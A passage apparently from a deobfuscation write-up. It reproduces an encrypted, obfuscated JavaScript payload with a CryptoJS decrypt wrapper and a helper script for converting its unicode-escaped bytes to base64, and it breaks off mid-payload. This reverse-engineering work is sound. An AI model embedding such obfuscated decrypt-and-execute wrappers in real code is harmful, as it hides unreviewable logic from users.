·Ró}nÃzÐ[Ý|Ü.~ÐeÎßþÌ=À¡ÂÖ £fÝÍÌäcàÝó\rumf\nÒ°ÈDZkÜÌÀ¡er¼DÀ¨÷¹©¸I]ǵ*AK@6F¦Á5ÐíºÊrÜJgoð îÀE=´oiGÄ]¸á¼è[ ѲÜ&Ë1/RQe°í²)þ³+¿¡4HÃuL®×ÌHóÕ!忼µZæ×ã$\\îkñLDNå\rçkç¶Ë»kQ6ñ1Iî¦MpÑ1>¨_Ä5þÏÂài1@¸ÎòÇÏS§µe\\ØÿA³ûKò:µÈg®daü_ã@¸ü«XIi§8HvØ{glªöàh\rrùäquîð¯ia¿Þ§Ý»Ëo<kïúZüÿëS&÷§Jתز=Ü<»ZÕ°Ëañµ?£8ìÞIò÷¶¼^Ú.S`è[ÇôºNf3QÑÁ\"«».ë-u%7x^òHg¹1\r]QÈÕ}¢û¼ÜB-þê/ñ/i!ÃT@
kÑ()}Y¶oDùö²ywÔ@È
7L4Ô/ðXöú¶ºåãXrå3?ã0!û4ÈàD~:ÏÈ-¾¤`LwÎSÎÕä2´2JÑähÉ{ôt.ôÖI¿wW·ä66vu/(Kh¼_<êÐÌPØÁtdËDëNJÏú nËÏý%·£T)ʽ\\qg@.]tn5ô\nà1Ò9î½×cöb÷_QRÞ!.ðXVLÙbF÷Ø·vÀí]A˾ÖÏ0o2¦-uª< òÇ»ÏÉÃRÍ?gòkµÞH:¢ä½¿Ù{Ï~?°A¬¬KZ89ÔÊéÍÚåÑGú~äêÙC¿§Ø·NßT`åHDåÒWÇ÷ 'RÍÒjâé Ѭ÷ÈéÈFe´~~|ñ¹éc®DýpÅØØ¥CÔ©`# Öý\r¿îfrá¡ß|úâÙñÐ<&O:äÍìn!óñX*(Ëk¶xô¸è¨O|bï´Í¦I9Ï;»qPÂÎXú4À_zælzÂWC¦S&`¦SâéGHò¾~lLæ$¬êN²7I,±¹Á
ÉêÕW:¦3ÉiÜ\n+ë13ømYÀuéVs´çxÃr0?hfö+Dg¥8ÚÆãaÑ]µâÆû=©(\r}úlÒ¹~r>µ{®å]Sáå¥öéówɬdòï´`~Ïû¤8%2¥ÎFÝTw6jI$¼M'9b4×mÅ&rhîÝúnÎ]øõ{ú\"ÓMR¬t_*ELChf,j<wmý8ѧ¶è£ñ|çwÊa?A'âæ|é°nѹÜÍÞJõ&|*dhÿ?s;y²¡¸7ôê<S*sQsù¥4^¾éÔí#,6LÕÕ1
ÚC-ü´¹Éoê1Qôß9XSp@úâÛ¤\rjthhV-Ì+T&øÛ¬¯§û¨Ï6ör´²T_»Ìl`|ªÊËP·,
IVÌ!é>q·ÑC·(ïeÇ[^èá6$¹ÛúX<]xäléõ ç àb$BÍ[· =ÃÝZ@1Å\"ö>TRÁC¿Â¤8ÊĹiDÞ
©ËóCÈÁOk%óÁìzËÓ?ª÷Ä~èº [x^ñ¢k+CÐ2øüm¡&ùm'øÂãÊ;\\6©ÓB'Ø!Ð Ô\røEñ[Ç1O#Û/U2RÆM¶Øz2ô-§èf<ìLv÷ àLT0øûÊP;[Ð6_,?¼h{E¹£ä×¹ËëKò
ê'e\rmtõ{ÅÍyÅ'Ô*ØWZJZC´¦Yàû ¼ä_G·,Rs;q²ÀÒ)1(× uøÏízcØ\\¹ª£UÖpã+N¶ü×V;ò¸»ÿ¶ i jÇ|kjɤkm1}NbGÇСGwBÇZ?ù_p¯î¸©&¼+ÄR&'kJù@Ç\"e:yIêCäÀ«6~a.-÷FТg»Í¡IâC©ºQÿ`ôclä¢iÛªðÕÎjv04±Ò±ëcÜòG(¬ôïT;f±ÿ{/tH$FG2æôB¨ï@ÒòèfóXá¥Øµìõ@ìe\ræ×nk |?ÓÈùçt^ªê©é3ÛØ`°£ÚhÌT;5ôbûõmÅàÍ0ßBs®3¥ÙV°Ä/@*¶°S·«!?TÇj¥¼hÌ°£K'l¡5(ÑWjfTGà|9yVkÎË«ì£ ¹½©bñAÜÏiv°mºöÑIùM1żqÐÕc´'¦QKâ&ï:¶[µ2¨IÖó,5z|ku6ù«£²½NñIÜЬt¹ ï)´uÝX¾]AsLì)\rÑ=Ìó98Ø¥TD]r_Í¡£¯Óð¼kåñÎSµÒUÆR@>^ì,ÕêÆW@`è !¼*;(¢w£ëæ5h$ªýKëTI`²U¿lkª¿ì²¹©)h7FbÅôýE&\\?\\'ó¿Éf~[CÚpe")))}, CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("Ûíl±¡Gò³¯L-²7)ÏT¼"))), {iv: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("äu&ÊJ7/8 üÆ\r 0")))}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]]));
To make life easier, I had created a script to convert them to base64 first before deobfuscating it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
const CryptoJS = require("./crypto-js");
(function () {
function unicodeToBase64(unicodeStr) {
let decodedStr = unicodeStr.replace(/\\u([\dA-Fa-f]{4})/g, (match, grp) =>
String.fromCharCode(parseInt(grp, 16))
);
return btoa(decodedStr);
}
var payload = "\u0062\u00FB\u0033\u00C0\u00DC\u005C\u0051\u001F\u0062\u00F0\u0023\u0053\u0013\u007F\u0014\u003D\u0022\u00D4\u0049\u009A\u00F5\u005B\u0040\u00D3\u004B\u008F\u009D\u00AC\u00C8\u0035\u0009\u0009\u0066\u005A\u0086\u0083\u007E\u003D\u00CA\u00E6\u00CD\u0043\u0001\u00ED\u00B9\u0020\u0003\u0056\u00D3\u0015\u0023\u0001\u00AC\u0001\u00F9\u009E\u0024\u001A\u00BE\u00DF\u007F\u004A\u00D7\u0030\u0064\u00C2\u008F\u00BE\u00C9\u0000\u0043\u0027\u0070\u00DD\u0050\u006B\u00A7\u0099\u00AA\u00BC\u00BA\u0010\u00C3\u0031\u005E\u00C3\u00A7\u0024\u00C3\u0065\u0069\u00DB\u00A1\u00A8\u0079\u0093\u00E0\u0056\u00BD\u00C4\u0095\u00A1\u0092\u000A\u0046\u007B\u00CB\u0076\u00B6\u004B\u00EC\u00AF\u0070\u0098\u008F\u008F\u004B\u0033\u0040\u00F0\u0074\u0061\u00F9\u0076\u0009\u00BF\u0015\u005A\u007A\u00BE\u00B6\u009D\u0049\u005B\u0028\u0028\u000B\u00DD\u0043\u0092\u009F\u00D6\u0043\u00A1\u0083\u002B\u00B8\u00E6\u006B\u003B\u002C\u000A\u00D9\u0019\u0078\u005E\u00E8\u0092\u00E7\u00FD\u0028\u0079\u0046\u004D\u00EE\u0074\u00B7\u00FD\u0094\u00A9\u0084\u00E6\u0085\u00A0\u00A8\u00E1\u00A7\u0044\u009A\u004C\u0021\u0050\u0056\u008B\u00CC\u00AA\u00EF\u0076\u0065\u00CD\u0021\u0001\u0075\u0041\u006F\u009D\u00CB\u006E\u00A5\u0055\u00F4\u0033\u0043\u000A\u0083\u005C\u00F4\u00D9\u0025\u008A\u0098\u003A\u00C6\u0088\u00E1\u0076\u0035\u00EF\u00F9\u00D4\u00BD\u004E\u0048\u0028\u0056\u0069\u0040\u003C\u00B1\u0086\u009E\u00E1\u00D9\u00BE\u0084\u005E\u0022\u0054\u0026\u00FE\u0006\u0022\u0000\u00D8\u0083\u0089\u00F4\u0075\u0078\u0052\u009C\u00DA\u0098\u0037\u00BA\u0004\u0016\u0046\u00A6\u00AD\u0088\u001B\u00D4\u0016\u000B\u00B6\u00BF\u002F\u0061\u00C9\u009A\u0056\u0048\u001C\u0085\u0080\u006D\u0031\u0066\u00F9\u00FA\u002F\u00F1\u0036\u0079\u0020\u00E7\u00B2\u002F\u00B6\u00B9\u001E\u00A7\u00AC\u0097\u00C5\u0015\u008B\u00CA\u005A\u008A\u009A\u0033\u001D\u003E\u0086\u006F\u0015\u0043\u0076\u0067\u000A\u00D0\u0007\u009B\u00A1\u00BB\u002F\u0026\u00CA\u0030\u00EB\u0023\u0093\u00C7\u001D\u00AC\u0057\u0073\u002F\u0028\u004A\u00A5\u00EC\u00D1\u005B\u0045\u0077\u0030\u0047\u0008\u0097\u00C4\u003B\u001C\u00CB\u00E9\u0033\u00E9\u0013\u007B\u00F6\u00D1\u00A4\u000A\u00AA\u0090\u008E\u0041\u005E\u000F\u00FA\u00AB\u00F4\u0068\u0087\u00C8\u009C\u00A6\u0037\u0083\u00EC\u0021\u0056\u00D8\u00B1\u0095\u0010\u00CC\u008D\u0023\u000F\u0074\u002F\u007B\u0085\u0037\u006C\u00D8\u00C8\u000C\u006A\u003A\u00B3\u0071\u0029\u00AC\u00B9\u004D\u0011\u00EF\u0097\u00F8\u00E2\u0044\u00E5\u00BF\u00FC\u0053\u00CF\u0026\u00CE\u00F2\u0046\u0059\u0017\u004D\u008B\u00F1\u002C\u0089\u00E1\u0056\u0040\u0058\u00A8\u00AC\u009B\u00F2\u0063\u0086\u0085\u0073\u009F\u00B4\u00B5\u00B3\u0041\u0037\u00F8\u0034\u009C\u00F4\u0088\u0059\u00D0\u008E\u004A\u00B5\u00C6\u0066\u0044\u0042\u0026\u00F2\u0008\u0090\u00F8\u0075\u00A5\u006C\u0041\u008D\u00B8\u0061\u00D4\u00E8\u0089\u00DD\u0087\u0087\u0014\u00C9\u0093\u0013\u00FC\u007D\u007E\u00E5\u0048\u0043\u002E\u002E\u004D\u00E6\u0078\u00FA\u00A1\u00F7\u008F\u0095\u00EC\u00B3\u006F\u003A\u00CF\u00A7\u00BF\u00F3\u0051\u0094\u008B\u007C\u00A0\u0030\u009B\u0019\u00C0\u00FE\u003B\u0052\u0041\u00CB\u00AF\u0008\u00E2\u00A8\u00A3\u0027\u0075\u00DE\u00A8\u00FF\u005C\u0054\u008B\u0069\u0019\u00F5\u007B\u00A0\u00CF\u0065\u0079\u00B6\u00FC\u0099\u0037\u0043\u007C\u00CD\u007F\u0068\u00E6\u00D3\u00E7\u0084\u0093\u0010\u0088\u000F\u00B8\u0040\u001D\u001B\u0038\u00CA\u0010\u0043\u0003\u0094\u00BD\u0076\u00AF\u000C\u000D\u00DA\u009D\u0049\u000B\u005F\u003E\u00A2\u00F3\u00D5\u0045\u00F8\u00DD\u001E\u0057\u0003\u0053\u0044\u006B\u009E\u003B\u00A7\u00DF\u004A\u001A\u0040\u0094\u0080\u00EC\u00E8\u009B\u0010\u00E6\u0040\u0079\u0057\u0020\u009F\u00FF\u001F\u0042\u006D\u0057\u0055\u00A1\u003F\u0091\u006E\u00D7\u00F7\u00A2\u0089\u00F2\u007A\u000D\u0088\u005E\u00CE\u002D\u00C5\u00C3\u0001\u0071\u002A\u007A\u003D\u009C\u00F5\u00C3\u0080\u00CA\u002D\u0069\u004B\u005B\u0061\u00CD\u0055\u000F\u009C\u00C6\u00E6\u00FB\u0038\u00A1\u00FB\u00D1\u00BA\u0062\u00BE\u0031\u0072\u00EF\u00C0\u00D6\u0056\u00FF\u00DA\u00FE\u00CA\u0081\u0001\u0072\u00BC\u0025\u0079\u00B8\u007F\u0055\u00C5\u0071\u008C\u000C\u00D4\u0059\u0030\u0022\u00CC\u00C8\u005D\u005B\u0077\u0009\u00A2\u0038\u0054\u0013\u003F\u00BC\u00CD\u001F\u0039\u00DE\u001A\u0046\u0057\u0016\u0045\u001F\u00FF\u001E\u002F\u002C\u0032\u00EA\u0029\u0035\u00A1\u008B\u001B\u00F7\u0048\u00D6\u000A\u004C\u009F\u0044\u0093\u00D2\u002B\u0023\u00F9\u0022\u0044\u001C\u0012\u00D6\u0061\u0097\u00AF\u004B\u001E\u00DC\u000E\u0033\u00F3\u00A1\u00FA\u0050\u00CE\u0000\u0024\u0086\u00C9\u0045\u0061\u00A7\u00BC\u0074\u0096\u0058\u0087\u00B6\u00D4\u006A\u0087\u00BB\u0027\u00D8\u00B6\u0045\u007D\u0030\u0097\u0089\u005D\u0034\u0023\u0042\u005B\u003D\u00A0\u0012\u00F3\u0032\u00EA\u0040\u006B\u0023\u00EA\u00A9\u003D\u006C\u0013\u009B\u007A\u0096\u00CA\u0023\u00CC\u009C\u001A\u0083\u0058\u0004\u0098\u005F\u008B\u0048\u0001\u0091\u00CF\u008F\u00D0\u004F\u0092\u0015\u0076\u00C0\u0078\u0072\u000D\u0071\u0001\u0022\u0063\u00B6\u007D\u00E9\u00D3\u004B\u00A7\u008F\u00ED\u00F7\u0016\u00AB\u002D\u00B9\u0001\u00F2\u008B\u00E9\u002F\u0062\u00EE\u003C\u008D\u0040\u0016\u00C0\u00A7\u0017\u0065\u00B9\u002F\u009E\u00DC\u00E4\u00BC\u00FD\u00E7\u0023\u002C\u0066\u000A\u0024\u008C\u00F2\u00E4\u00AE\u00A3\u00C1\u0068\u007D\u001E\u0058\u000F\u0081\u00D5\u0047\u0010\u005B\u000A\u002A\u00B6\u0041\u003A\u00A8\u001D\u00DD\u0091\u0008\u007C\u005D\u00E1\u0013\u0002\u0004\u00B8\u0087\u00FA\u0019\u0009\u00B8\u00C1\u0044\u005D\u006E\u007D\u000E\u0092\u001E\u0034\u008D\u0076\u00B7\u00D4\u009E\u0059\u004C\u00CD\u0011\u002D\u0047\u00A0\u00EA\u002A\u0098\u0039\u00A5\u00DF\u008F\u0041\u00FF\u0000\u00C6\u003B\u00E0\u0025\u00F4\u0005\u00C0\u00FB\u005B\u0013\u0090\u0038\u00FA\u0031\u0037\u00BA\u0011\u006E\u00DB\u009A\u00BD\u0074\u004F\u0047\u0039\u00B8\u0047\u001E\u00F6\u00BF\u0008\u00E7\u0029\u004A\u0031\u00C8\u009F\u0099\u0045\u009A\u00B4\u00FF\u0009\u0052\u00BC\u00FE\u00C3\u006A\u0092\u007D\u000E\u00E4\u00A8\u000B\u007E\u0054\u000E\u0088\u00B2\u0058\u00F5\u00DD\u0044\u0054\u00F9\u0067\u0072\u00B0\u00DD\u00F6\u0047\u00C3\u00D5\u00A3\u00AE\u003C\u0051\u003E\u00DE\u0019\u00BC\u0041\u0065\u0024\u0067\u0045\u0075\u002E\u0008\u0086\u00AF\u0037\u00CD\u008B\u0000\u0062\u0063\u0069\u00C4\u003B\u0065\u00F7\u008A\u00C9\u0043\u00FC\u005E\u0080\u0058\u0046\u002A\u0059\u0074\u00D0\u0041\u00D3\u0069\u0027\u0045\u0053\u0001\u00A7\u00F4\u0065\u003C\u00D5\u00CE\u008E\u0066\u0077\u00A1\u00D8\u003B\u00EA\u0054\u003F\u003B\u00EE\u00E8\u00BD\u00B6\u0040\u00FE\u0009\u0071\u00DA\u001B\u007F\u00D4\u0019\u003E\u0065\u0062\u00F1\u00CA\u00EB\u0073\u0004\u0061\u00A4\u00B6\u006B\u0002\u0082\u00AA\u00DA\u00DA\u00FA\u007B\u0093\u005E\u0053\u0080\u0049\u0017\u008E\u00ED\u00EF\u0058\u0016\u005D\u0041\u006C\u0015\u0088\u0088\u0085\u00A6\u004D\u0003\u00A8\u0014\u001C\u000B\u0085\u0049\u0042\u006A\u00DA\u006C\u00CD\u00DD\u00C3\u0049\u00F7\u00E4\u0049\u0049\u0027\u0018\u00E4\u00A8\u0045\u0069\u00F5\u000A\u0009\u0045\u00CD\u00BC\u0075\u0047\u009A\u0056\u00BE\u002A\u0026\u00C0\u00E8\u007C\u004E\u000D\u003B\u00E8\u0017\u00BA\u0098\u008D\u0008\u0062\u0047\u00EC\u00D4\u0005\u00AD\u003D\u0094\u008B\u00A0\u0023\u0054\u0016\u00A9\u0022\u00E9\u00DD\u007A\u0046\u00D1\u0022\u0074\u0020\u0006\u004B\u006F\u0099\u003F\u004E\u00B1\u001C\u00D6\u0081\u00D9\u001C\u003D\u0099\u0086\u00EA\u00EF\u0084\u0088\u0044\u0060\u004D\u0048\u0039\u0099\u0015\u00D8\u00D4\u0029\u009F\u00E2\u0056\u00E4\u001A\u0008\u0049\u00A3\u009C\u0056\u00AE\u00AC\u0052\u0089\u0002\u00D8\u00FB\u007E\u0078\u006D\u00AF\u00E9\u0065\u0020\u00A4\u00C0\u0013\u007D\u00C0\u0085\u0072\u00CF\u00FB\u00DD\u00F9\u00C3\u00A7\u0097\u000E\u0048\u003D\u00ED\u00A8\u0055\u00FA\u0070\u00F3\u001F\u0034\u0012\u00E1\u00C4\u000D\u00A1\u0055\u000F\u008D\u0000\u0039\u00BE\u0070\u0078\u0005\u0051\u0030\u00BA\u0023\u00C2\u00F8\u006F\u0045\u0098\u00B5\u00BE\u00A5\u0031\u0007\u0078\u0097\u0078\u00B8\u002E\u00C0\u0069\u0037\u0099\u0019\u00E3\u007D\u0025\u0003\u002B\u00EF\u0008\u00AD\u0055\u0094\u00E2\u009F\u0008\u0016\u0078\u0029\u00A7\u0067\u0059\u006A\u000F\u0080\u008D\u00A4\u001F\u0003\u00BD\u00AE\u0071\u0057\u0043\u0049\u00D4\u0034\u0012\u00AD\u0069\u00E3\u0085\u001F\u002B\u0063\u00BB\u00A7\u00DF\u005C\u00C6\u000C\u0076\u000B\u0006\u003F\u00D9\u0086\u00B5\u00D4\u0095\u00D8\u0064\u00E4\u00FA\u00F8\u0038\u0023\u008D\u00E6\u00A8\u0022\u00B6\u0047\u00DD\u005E\u00D6\u00CE\u001D\u0084\u003E\u0088\u00A5\u00C7\u0071\u004E\u0009\u00CA\u0023\u00A6\u0078\u00FD\u00C2\u0053\u003F\u00FE\u00A1\u002B\u0051\u0000\u00E6\u00FF\u00C5\u0045\u0073\u00BA\u0061\u004A\u00AE\u00C8\u00CF\u0006\u0036\u0044\u00FE\u0072\u00BF\u00B1\u005C\u0051\u00EB\u0003\u00C9\u00F3\u0020\u00B8\u0071\u00FA\u0046\u009D\u001A\u00D4\u000F\u0072\u0082\u0094\u0045\u0016\u000E\u00AA\u00F6\u00E2\u000E\u00A1\u001B\u008C\u000A\u0082\u0049\u003E\u0093\u00CB\u0087\u00CB\u00E9\u009C\u00B0\u0030\u0036\u007A\u00A6\u002A\u0016\u0020\u00DB\u00B1\u009E\u008E\u0003\u00A8\u008E\u005B\u005B\u0099\u001C\u00EA\u002E\u00AB\u000D\u005D\u00A3\u00A0\u00E8\u00CA\u00D7\u000B\u0081\u003D\u002F\u0039\u0083\u006F\u006B\u000D\u003A\u0025\u00CC\u00EE\u00DE\u006C\u0037\u007D\u0044\u0062\u0062\u0033\u0047\u0082\u00D9\u000D\u00A3\u0095\u00E1\u00F5\u0043\u00F3\u00A4\u00F3\u006E\u0071\u0019\u0021\u00D6\u009E\u000C\u0080\u0007\u00E7\u0076\u0034\u00AC\u0019\u0021\u0019\u002B\u00D3\u00C2\u00F2\u0072\u002B\u00C6\u00A8\u0043\u00F6\u00D9\u00B9\u004F\u0067\u0097\u0093\u007B\u0040\u001E\u0004\u0020\u00FC\u003F\u00D3\u00AD\u0079\u006E\u00E9\u008C\u00C7\u00EA\u00A7\u0009\u0054\u009D\u0030\u0088\u0044\u0016\u0017\u0061\u00DC\u00F6\u0057\u00C5\u0080\u001B\u0000\u0026\u0033\u0034\u0079\u009C\u0021\u00BC\u00A7\u0032\u0083\u00D7\u0082\u00CA\u0029\u0031\u0000\u0085\u0031\u0045\u0009\u0002\u00D9\u00F8\u0025\u00D8\u00E4\u0019\u0003\u00FA\u00B8\u00A5\u009B\u0093\u001F\u00FC\u00E6\u002F\u00F0\u0018\u00A3\u0021\u00E4\u0071\u001D\u0018\u0014\u00E9\u0027\u007A\u0070\u0072\u00D7\u002D\u00E2\u00A7\u0048\u00F7\u009F\u0072\u00E2\u00C7\u0094\u00A9\u00D4\u00E7\u0004\u0092\u00F1\u0076\u001D\u0031\u00E7\u009D\u00D3\u0087\u00EF\u00D4\u00D8\u00C5\u001F\u00FF\u008B\u00E9\u0041\u00EA\u00E9\u002D\u005A\u006C\u00A8\u008E\u0076\u0072\u0072\u0015\u003C\u00E6\u0004\u0005\u00A1\u00C7\u0001\u00EF\u00BB\u0055\u006E\u0030\u0017\u00E4\u0076\u00F9\u00FA\u002C\u0064\u008D\u00AE\u000D\u0097\u00D8\u0040\u005A\u00C4\u0039\u00E4\u006A\u0011\u0012\u00B5\u0061\u00FE\u0016\u001F\u00BA\u0070\u005A\u003A\u008F\u0033\u0091\u00F6\u0016\u00E2\u00E1\u0076\u0088\u00B3\u0007\u0068\u0032\u00CC\u0040\u00FB\u00E5\u0029\u008C\u0052\u00FC\u00CB\u000A\u00DF\u00EC\u00FB\u00AA\u0034\u003C\u00A1\u00D4\u00A1\u004B\u00C7\u0072\u006F\u00CF\u0003\u0004\u00D7\u002E\u00C9\u00B5\u0096\u008F\u00C6\u0039\u0045\u00A2\u008F\u0087\u0011\u0078\u0052\u00E8\u0080\u0086\u0091\u0082\u00AC\u00E5\u004F\u000B\u0040\u00EE\u0081\u00F4\u0025\u0001\u008E\u0019\u00B8\u00D2\u0052\u0028\u00ED\u00E5\u0029\u00DD\u0076\u000A\u0002\u00B9\u003F\u00D8\u000E\u00EB\u003C\u00DA\u00A1\u005A\u006E\u009E\u001B\u006A\u0034\u002A\u0071\u0083\u005C\u0011\u00E2\u00B9\u00A8\u0047\u0046\u00A9\u005E\u0056\u0088\u0053\u003E\u00ED\u0028\u0019\u001A\u00E6\u0050\u00AA\u0095\u0017\u000F\u00C3\u002D\u00C1\u0088\u004E\u0025\u007D\u0004\u0017\u0098\u005B\u0030\u00A1\u001E\u003C\u00FC\u007B\u00D1\u000B\u00C9\u00B3\u00A0\u002E\u0065\u0080\u0034\u0084\u0022\u00D4\u0079\u0053\u007D\u00D0\u0002\u005B\u00A2\u0060\u009B\u00BD\u000A\u006D\u009B\u007D\u00D5\u00A6\u0067\u00C8\u006E\u007C\u006B\u0090\u00C8\u000D\u00E4\u0026\u002E\u00BF\u0044\u0009\u00D3\u000F\u0047\u0001\u003C\u006A\u0012\u008C\u0028\u00DC\u00F2\u0041\u00AF\u0032\u0012\u0087\u0007\u008E\u00AC\u0011\u00F7\u007D\u0007\u0027\u004C\u0097\u0010\u00B3\u00D1\u00B7\u00B7\u0055\u000E\u001F\u00EC\u0025\u0082\u00AA\u00D0\u00BE\u0068\u0022\u00C0\u00E3\u0073\u00A1\u0006\u00BE\u00DB\u00C3\u0015\u0048\u0093\u0036\u0043\u0046\u009C\u0024\u003F\u00FA\u005B\u003B\u0015\u00EA\u00EF\u00C1\u0060\u00A1\u0096\u00DD\u0019\u0099\u00F1\u000E\u0075\u00DC\u0010\u004F\u0084\u00EA\u00F9\u0064\u000A\u0093\u008F\u004E\u001D\u00F8\u00A8\u00E3\u0016\u003F\u00B8\u001C\u0069\u00FC\u007E\u00E5\u0067\u003F\u00B9\u00A7\u00E9\u008A\u0054\u0008\u0069\u008E\u00F3\u000F\u0099\u0078\u0089\u00E0\u0009\u00CE\u00C7\u00F9\u000E\u00AA\u009E\u00C4\u00DF\u003B\u0065\u0028\u0099\u0055\u0064\u00A0\u0065\u00CF\u006F\u001A\u008A\u00DE\u0060\u00EA\u00D8\u00FA\u00D1\u007F\u00F4\u00CA\u00CA\u00C7\u00D1\u006C\u002B\u00AF\u00C7\u00C1\u00A8\u009C\u00EA\u000D\u00B9\u0058\u00FA\u00BC\u0093\u002B\u006F\u00C8\u001C\u0012\u003B\u0071\u0063\u0023\u007B\u00EB\u0090\u0078\u0034\u0064\u009C\u0031\u00BF\u001B\u0042\u00CF\u0051\u00A7\u003E\u00A1\u005F\u0075\u00F3\u0026\u009B\u0000\u00D5\u0026\u00FE\u0077\u0038\u0085\u000C\u00E1\u00DB\u0096\u0020\u00C3\u0005\u00A0\u009E\u00BA\u0035\u00DD\u005D\u0011\u0095\u0020\u000F\u00DC\u00E0\u003F\u00C7\u0052\u00AB\u00EC\u0001\u00C0\u0021\u00BB\u0087\u0030\u0033\u00F1\u00A7\u008E\u0062\u00BF\u002E\u0076\u0050\u00CE\u005C\u005C\u0045\u008C\u0069\u00B9\u002C\u0084\u0080\u005F\u00DD\u00B9\u0030\u004D\u005C\u00FD\u002A\u00CD\u0003\u00AD\u00EF\u0088\u00C8\u005F\u0008\u008F\u00EF\u00EE\u0049\u00B6\u00C2\u00A3\u0094\u00BB\u00F1\u002A\u002E\u003F\u00C0\u006C\u0048\u00D2\u0056\u00E0\u004A\u0008\u004F\u0051\u00E3\u00C5\u0094\u00D7\u00E1\u004A\u0021\u000C\u0041\u0007\u0086\u0044\u00CA\u0019\u00E3\u00D8\u0095\u00A0\u00FE\u009E\u00C2\u00E1\u005E\u00BF\u00BB\u0002\u00A4\u0002\u006E\u0048\u00B6\u002C\u000B\u0067\u0072\u0062\u0002\u00B7\u00F3\u0042\u0082\u008C\u00E6\u0049\u00AC\u00F7\u0028\u00BE\u003C\u00E3\u005D\u0057\u00F3\u0073\u00F8\u0010\u00A7\u004F\u0099\u0062\u0029\u003D\u0015\u009D\u00C9\u008B\u00D7\u0001\u00C6\u0089\u0099\u00DF\u00B8\u00FA\u007F\u00AB\u0089\u0064\u0055\u0060\u0062\u005B\u00D1\u00E6\u003A\u00B2\u00DE\u0045\u00BD\u0083\u0018\u007D\u00DC\u00F0\u001E\u00DB\u00C1\u00D1\u00ED\u0041\u0010\u0057\u00D1\u0096\u0032\u00CA\u0022\u009A\u0060\u00FD\u0043\u001B\u00A8\u0073\u0082\u0041\u0037\u0002\u008F\u005B\u00CB\u0077\u001B\u0073\u003C\u0072\u00CD\u00E8\u007E\u008B\u0015\u0058\u00D5\u0010\u0003\u008A\u0015\u00C1\u00D3\u0050\u002C\u0065\u00F0\u00CE\u0020\u00E6\u005A\u009E\u00B7\u007C\u0010\u00BE\u0042\u0045\u006F\u00DC\u002E\u00D6\u00F8\u00BA\u0019\u005A\u00AB\u003C\u0025\u00C2\u008C\u0059\u0034\u009C\u0067\u00B2\u0093\u00DF\u00E7\u0095\u004F\u00B8\u0046\u000D\u0096\u0015\u002C\u00D6\u0004\u0079\u00FA\u0070\u003E\u00AD\u00FE\u0023\u0027\u00C3\u00F6\u00D1\u00D7\u00D5\u00F7\u00BD\u0048\u00CF\u0014\u0010\u0097\u0062\u00A3\u005E\u002B\u0093\u004E\u007B\u00F9\u00D4\u00D3\u0064\u001F\u00D7\u00F7\u0018\u00C0\u0083\u00A1\u00AC\u00C1\u00F0\u00BB\u0035\u006F\u0007\u0032\u0060\u003B\u00CB\u00D8\u0051\u0042\u00FC\u00F1\u0026\u003C\u0098\u0043\u006C\u00D1\u006E\u00B7\u0024\u0042\u00CE\u0016\u004D\u0040\u0010\u003D\u0092\u00A8\u00AB\u00C6\u00D0\u0078\u00EF\u0079\u003A\u0069\u0018\u002E\u00FE\u0089\u0023\u00FA\u0085\u00B7\u0052\u00F3\u007D\u006E\u00C3\u0092\u007A\u00D0\u005B\u008B\u00DD\u007C\u00DC\u002E\u007E\u0092\u00D0\u0065\u0008\u00CE\u00DF\u00FE\u00CC\u003D\u00C0\u00A1\u00C2\u00D6\u0020\u0005\u00A3\u0066\u00DD\u00CD\u00CC\u00E4\u0063\u00E0\u00DD\u00F3\u0018\u000D\u0075\u0007\u006D\u0066\u000A\u00AD\u00D2\u008C\u008F\u00B0\u0006\u00C8\u00C7\u00B1\u006B\u00DC\u00CC\u00C0\u00A1\u0065\u001D\u0072\u00BC\u0012\u0044\u0093\u000F\u00C0\u00A8\u00F7\u00B9\u00A9\u0091\u00B8\u0049\u005D\u00C7\u00B5\u002A\u0018\u0041\u004B\u0040\u0036\u009C\u0046\u0002\u00A6\u00C1\u0035\u008D\u008D\u00D0\u008F\u00ED\u00BA\u00CA\u0072\u0089\u00DC\u004A\u0008\u0067\u006F\u00F0\u0009\u0089\u00EE\u0012\u00C0\u0045\u0094\u003D\u00B4\u006F\u0069\u0047\u00C4\u005D\u00B8\u00E1\u00BC\u00E8\u005B\u0020\u00D1\u0080\u00B2\u00DC\u0026\u00CB\u0007\u0031\u0095\u0006\u002F\u000F\u0052\u0051\u0065\u0001\u00B0\u00ED\u00B2\u0011\u0029\u00FE\u0017\u0087\u00B3\u002B\u00BF\u0002\u0019\u00A1\u0034\u0048\u00C3\u0075\u004C\u0099\u00AE\u00D7\u00CC\u0048\u00F3\u00D5\u008A\u0021\u00E5\u00BF\u00BC\u00B5\u005A\u00E6\u00D7\u0014\u00E3\u007F\u0024\u005C\u00EE\u008A\u006B\u008C\u00F1\u004C\u0044\u0091\u004E\u00E5\u000D\u00E7\u0090\u0081\u006B\u00E7\u00B6\u008A\u00CB\u00BB\u000B\u006B\u0051\u0036\u00F1\u0095\u0031\u0049\u00EE\u00A6\u008D\u004D\u0070\u00D1\u0031\u003E\u00A8\u005F\u0099\u0084\u0091\u00C4\u0035\u00FE\u0090\u00CF\u0086\u00C2\u001E\u00E0\u0093\u0069\u0031\u0040\u00B8\u0005\u00CE\u00F2\u00C7\u00CF\u0017\u0053\u00A7\u00B5\u0090\u0098\u0065\u005C\u00D8\u00FF\u0041\u00B3\u00FB\u0017\u004B\u00F2\u003A\u00B5\u00C8\u0067\u00AE\u0064\u0092\u0061\u00FC\u005F\u00E3\u0040\u00B8\u00FC\u000C\u00AB\u0058\u0091\u0049\u0069\u0089\u00A7\u0015\u0038\u0048\u0076\u00D8\u007B\u0067\u006C\u00AA\u0095\u00F6\u00E0\u0068\u000D\u0072\u00F9\u00E4\u0092\u0071\u0075\u00EE\u00F0\u00AF\u0069\u009D\u0061\u00BF\u009C\u00DE\u00A7\u00DD\u00BB\u00CB\u006F\u003C\u006B\u0083\u00EF\u00FA\u005A\u00FC\u00FF\u0093\u0097\u00EB\u0053\u0026\u00F7\u00A7\u001B\u000B\u004A\u00D7\u00AA\u00D8\u00B2\u003D\u00DC\u0086\u003C\u00BB\u005A\u00D5\u00B0\u00CB\u0061\u00F1\u0012\u00B5\u003F\u00A3\u0038\u00EC\u00DE\u0049\u00F2\u00F7\u00B6\u00BC\u005E\u00DA\u0008\u002E\u0053\u0060\u00E8\u005B\u00C7\u00F4\u0013\u00BA\u004E\u0066\u0033\